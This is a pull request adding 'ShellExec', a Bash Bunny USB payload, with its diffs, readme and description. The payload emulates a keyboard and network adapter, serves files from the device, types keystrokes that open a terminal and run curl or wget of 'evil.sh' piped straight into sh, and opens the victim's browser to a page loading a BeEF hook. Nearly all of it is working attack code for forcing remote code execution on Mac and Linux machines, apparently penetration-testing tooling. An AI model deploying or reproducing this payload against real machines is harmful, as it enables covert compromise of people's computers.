### PR TITLE
[PAYLOAD] - ShellExec

### DIFF
--- a/payloads/library/ShellExec/evil.sh
+++ b/payloads/library/ShellExec/evil.sh
@@ -1,0 +1,6 @@
+!#/bin/bash
+
+# opens browsers to the bunny's index.html page
+
+[[ "$(uname)" == "Darwin" ]] && open http://172.16.64.1
+[[ "$(uname)" == "Linux" ]] && xdg-open http://172.16.64.1

--- a/payloads/library/ShellExec/hook.js
+++ b/payloads/library/ShellExec/hook.js
@@ -1,0 +1,1 @@
+alert('This is where your evil JavaScript file would go')

--- a/payloads/library/ShellExec/index.html
+++ b/payloads/library/ShellExec/index.html
@@ -1,0 +1,12 @@
+<html>
+<head>
+  <script type="text/javascript" src="http://172.16.64.1/hook.js"></script>
+</head>
+
+<body>
+Nothing to see here!
+</body>
+
+</html>
+
+

--- a/payloads/library/ShellExec/payload.txt
+++ b/payloads/library/ShellExec/payload.txt
@@ -26,22 +26,12 @@ cd $payload_dir
 # starting server
 LED R G 500
 
-cat <<EOF | python &>> $log_file &
-import SimpleHTTPServer
-import BaseHTTPServer
-import SocketServer
-
-#Disable logging DNS lookups
-BaseHTTPServer.BaseHTTPRequestHandler.address_string = lambda self: str('$TARGET_IP')
-
-settings = ('$HOST_IP',80)
-Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
-httpd = SocketServer.TCPServer(settings, Handler)
-httpd.serve_forever();
-EOF
+# disallow outgoing dns requests so server starts immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80
 
 # wait until port is listening
-while ! nc -z $HOST_IP 80; do sleep 0.2; done
+while ! nc -z localhost 80; do sleep 0.2; done
 
 # attack commences
 LED B 500

--- a/payloads/library/ShellExec/payload.txt
+++ b/payloads/library/ShellExec/payload.txt
@@ -1,0 +1,49 @@
+#!/bin/bash
+
+# Title:     ShellExec
+# Author:    audibleblink
+# Target:    Mac/Linux
+# Version:   1.0
+#
+# Create a web server on the BashBunny and forces
+# the victim download and execute a script.
+#
+# White            |  Ready
+# Ammber blinking  |  Waiting for server
+# Blue blinking    |  Attacking
+# Green            |  Finished
+
+LED R G B
+ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
+
+source bunny_helpers.sh
+
+# switch to payload directory
+cd /root/udisk/payloads/$SWITCH_POSITION
+
+# starting server
+LED R G 500
+python -c "import SimpleHTTPServer; import BaseHTTPServer; h=BaseHTTPServer.HTTPServer(('$HOST_IP', 80),SimpleHTTPServer.SimpleHTTPRequestHandler); h.serve_forever();" &> server.log &
+
+# wait until port is listening
+while ! nc -z $HOST_IP 80; do sleep 0.2; done
+
+# attack commences
+LED B 500
+
+Q GUI SPACE
+Q DELAY 300
+Q STRING terminal
+Q DELAY 100
+Q ENTER
+Q DELAY 2000
+
+# Q ALT F2 # swap with block above for linux
+# Q DELAY 100
+
+Q STRING curl "http://$HOST_IP/evil.sh" \| sh
+# in case curl isn't installed
+# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh 
+Q ENTER
+
+LED G

--- a/payloads/library/ShellExec/payload.txt
+++ b/payloads/library/ShellExec/payload.txt
@@ -18,12 +18,27 @@ ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
 
 source bunny_helpers.sh
 
-# switch to payload directory
-cd /root/udisk/payloads/$SWITCH_POSITION
+payload_dir=/root/udisk/payloads/$SWITCH_POSITION
+log_file=$payload_dir/shellexec.log
+
+cd $payload_dir
 
 # starting server
 LED R G 500
-python -c "import SimpleHTTPServer; import BaseHTTPServer; h=BaseHTTPServer.HTTPServer(('$HOST_IP', 80),SimpleHTTPServer.SimpleHTTPRequestHandler); h.serve_forever();" &> server.log &
+
+cat <<EOF | python &>> $log_file &
+import SimpleHTTPServer
+import BaseHTTPServer
+import SocketServer
+
+#Disable logging DNS lookups
+BaseHTTPServer.BaseHTTPRequestHandler.address_string = lambda self: str('$TARGET_IP')
+
+settings = ('$HOST_IP',80)
+Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
+httpd = SocketServer.TCPServer(settings, Handler)
+httpd.serve_forever();
+EOF
 
 # wait until port is listening
 while ! nc -z $HOST_IP 80; do sleep 0.2; done

--- a/payloads/library/ShellExec/readme.md
+++ b/payloads/library/ShellExec/readme.md
@@ -1,0 +1,34 @@
+# ShellExec
+
+Author: audibleblink
+Version: 1.0
+
+## Description
+
+Serves malicious scripts or web pages from the Bunny and forces
+victims to curl and execute those scripts. Scripts can also force
+browsers to open a url on the bunny to do things like serve BeEF 
+hooks.
+
+## Configuration
+
+evil.py - script that is fetched with DuckyScript 
+(provided script opens a web page that serves a BeEF hook )
+
+hook.js - the aforementioned BeEF hook
+
+index.html - BeEF hook delivery page
+
+## Requirements
+
+Just plug and play
+
+## Status
+
+| LED              | Status              |
+| ---------        | -----------         |
+| White            |  Ready              |
+| Amber blinking   |  Waiting for server |
+| Blue blinking    |  Attacking          |
+| Green            |  Finished           |
+


### PR DESCRIPTION
This payload serves malicious files over http and uses HID to make the target `curl` or `wget` them straight into `sh` without saving to disk. 

Malicious files can be anything, but since this payload is also a webserver, it can serve malicious pages and infect browsers with things like BeEF hooks. Sample included